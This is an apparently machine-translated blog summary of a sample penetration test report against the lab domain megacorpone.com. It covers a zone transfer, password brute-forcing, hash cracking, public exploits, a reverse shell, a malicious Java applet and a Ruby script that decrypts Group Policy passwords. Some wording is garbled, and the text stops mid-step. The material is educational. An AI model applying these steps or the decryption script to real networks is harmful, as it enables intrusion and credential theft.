A foreign penetration test report

Sleepy Dragon · 2013/09/10 20:13

From:penetration-testing-sample-report-2013.pdf

Penetration test report by offensive security, translated with highlights 🙂

The process is very wonderful ~

The domain name of this test is megacorpone.com

Take a look at its DNS server:

Then, a domain transfer vulnerability was found in NS2.megacorpone.com.

About the domain transfer, can drops.wooyun.org/papers/64 reference here

It can be seen from the picture that all domain names are in the IP segment of 50.7.67.x. The network topology is as follows:

Find apache webServer on port 81 of admin.megacorpone.com and scan the file path:

You can see that /admin is a path that requires authentication.

According to the content of www.megacorpone.com website made a dictionary, blasting password, user name with admin.

Crack the password for: nanotechnology1

After entering the screen:

PhpSQLiteCMS, which manage SQLite data:

You can query the hash of the user name and password on this page:

The test found that the saved hash was not the usual way, so download a copy of phpSelitecms to see how it hashes:

The way to hash is to use a 10-character salt together with sha1, and string concatenation of the original salt together in the database.

We use the same hash method to violently collide passwords, try to crack other accounts, and crack two more. The advantage of collecting passwords is that other systems may also use the same username and password, so it is easy to enter.

There is a public code injection vulnerability in SQLite Manager software, you can use exp to exploit it directly:

www.exploit-db.com/exploits/24…

Bounce back to shell:

Server topology:

At the same time, it is found that the server can lift the weight, using exp to lift the weight:

www.exploit-db.com/exploits/18…

The server is now in full control.

After a good analysis of the server, the Java application in the Web directory is only allowed to access one network segment.

It was later discovered that one of this network of administrators:

We added a Java applet to the Web client to directly control the remote client.

(PS: There are so many Java 0days, I don’t know if I can put them on the page directly.)

After the administrator downloads and allows:

The network topology is as follows:

The administrator’s computer is found in the domain and is promoted to domain administrator.

A group management file was found in the system.

(ps: regarding the specialized to checked the is a question of managing existence of the 2008 domain: www.carnal0wnage.com/papers/LARE.)

There are RB scripts on Metasploit to find XML files and decrypt them: github.com/rapid7/meta…

Check the groups.xml file:

Decryption:

Decrypted Ruby script posted:

The method of use is:

# ruby decrypt. Rb ciphertextCopy the code

#! ruby require 'rubygems' require 'openssl' require 'base64' #encrypted_data = "AzVJmXh/J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk" encrypted_data = ARGV def decrypt(encrypted_data) padding = "=" * (4 - (encrypted_data.length % 4)) epassword = "#{encrypted_data}#{padding}" decoded = Base64.decode64(epassword) key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb 6\x6c\x1b" aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC") aes.decrypt aes.key = key plaintext = aes.update(decoded) plaintext << aes.final pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion return pass end blah = decrypt(encrypted_data) puts blahCopy the code

Try to use plink port forwarding to forward the remote desktop connection on the Intranet, but it is blocked: